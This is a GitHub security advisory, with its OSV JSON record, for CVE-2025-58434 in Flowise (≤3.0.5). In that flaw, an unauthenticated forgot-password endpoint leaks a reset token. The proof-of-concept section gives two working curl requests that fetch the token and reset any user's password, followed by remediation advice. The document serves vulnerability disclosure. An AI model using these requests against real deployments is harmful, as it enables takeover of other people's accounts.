GHSA-WGPV-6J63-X5PH
Vulnerability from github – Published: 2025-09-12 20:02 – Updated: 2025-09-15 15:31
Summary
The forgot-password endpoint in Flowise returns sensitive information including a valid password reset tempToken without authentication or verification. This enables any attacker to generate a reset token for arbitrary users and directly reset their password, leading to a complete account takeover (ATO).
This vulnerability applies to both the cloud service (cloud.flowiseai.com) and self-hosted/local Flowise deployments that expose the same API.
CVSS v3.1 Base Score: 9.8 (Critical)
Vector String: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
Details
- The endpoint /api/v1/account/forgot-password accepts an email address as input.
- Instead of only sending a reset email, the API responds directly with sensitive user details, including:
  - User ID, name, email, hashed credential, status, timestamps.
  - A valid tempToken and its expiry, which is intended for password reset.
- This tempToken can then be reused immediately in the /api/v1/account/reset-password endpoint to reset the password of the targeted account without any email verification or user interaction.
- Exploitation requires only the victim’s email address, which is often guessable or discoverable.
- Because the vulnerable endpoints exist in both Flowise Cloud and local/self-hosted deployments, any exposed instance is vulnerable to account takeover.
This effectively allows any unauthenticated attacker to take over arbitrary accounts (including admin or privileged accounts) by requesting a reset for their email.
PoC
- Request a reset token for the victim
curl -i -X POST https://<target>/api/v1/account/forgot-password \
-H "Content-Type: application/json" \
-d '{"user":{"email":"<victim@example.com>"}}'
Response (201 Created):
{
"user": {
"id": "<redacted-uuid>",
"name": "<redacted>",
"email": "<victim@example.com>",
"credential": "<redacted-hash>",
"tempToken": "<redacted-tempToken>",
"tokenExpiry": "2025-08-19T13:00:33.834Z",
"status": "active"
}
}
- Use the exposed tempToken to reset the password
curl -i -X POST https://<target>/api/v1/account/reset-password \
-H "Content-Type: application/json" \
-d '{
"user":{
"email":"<victim@example.com>",
"tempToken":"<redacted-tempToken>",
"password":"NewSecurePassword123!"
}
}'
Expected Result: 200 OK
The victim’s account password is reset, allowing full login.
Impact
- Type: Authentication bypass / Insecure direct object exposure.
- Impact:
  - Any account (including administrator or high-value accounts) can be reset and taken over with only the email address.
  - Applies to both Flowise Cloud and locally hosted/self-managed deployments.
  - Leads to full account takeover, data exposure, impersonation, and possible control over organizational assets.
  - High likelihood of exploitation since no prior access or user interaction is required.
Recommended Remediation
- Do not return reset tokens or sensitive account details in API responses. Tokens must only be delivered securely via the registered email channel.
- Ensure forgot-password responds with a generic success message regardless of input, to avoid user enumeration.
- Require strong validation of the tempToken (e.g., single-use, short expiry, tied to request origin, validated against email delivery).
- Apply the same fixes to both cloud and self-hosted/local deployments.
- Log and monitor password reset requests for suspicious activity.
- Consider multi-factor verification for sensitive accounts.
Credit
⚠️ This is a Critical ATO vulnerability because it allows attackers to compromise any account with only knowledge of an email address, and it applies to all deployment models (cloud and local).
{
"affected": [
{
"database_specific": {
"last_known_affected_version_range": "\u003c= 3.0.5"
},
"package": {
"ecosystem": "npm",
"name": "flowise"
},
"ranges": [
{
"events": [
{
"introduced": "0"
},
{
"fixed": "3.0.6"
}
],
"type": "ECOSYSTEM"
}
]
}
],
"aliases": [
"CVE-2025-58434"
],
"database_specific": {
"cwe_ids": [
"CWE-306"
],
"github_reviewed": true,
"github_reviewed_at": "2025-09-12T20:02:40Z",
"nvd_published_at": "2025-09-12T18:15:34Z",
"severity": "CRITICAL"
},
"id": "GHSA-wgpv-6j63-x5ph",
"modified": "2025-09-15T15:31:14Z",
"published": "2025-09-12T20:02:40Z",
"references": [
{
"type": "WEB",
"url": "https://github.com/FlowiseAI/Flowise/security/advisories/GHSA-wgpv-6j63-x5ph"
},
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2025-58434"
},
{
"type": "WEB",
"url": "https://github.com/FlowiseAI/Flowise/commit/9e178d68873eb876073846433a596590d3d9c863"
},
{
"type": "PACKAGE",
"url": "https://github.com/FlowiseAI/Flowise"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
"type": "CVSS_V3"
}
],
"summary": "Flowise Cloud and Local Deployments have Unauthenticated Password Reset Token Disclosure that Leads to Account Takeover"
}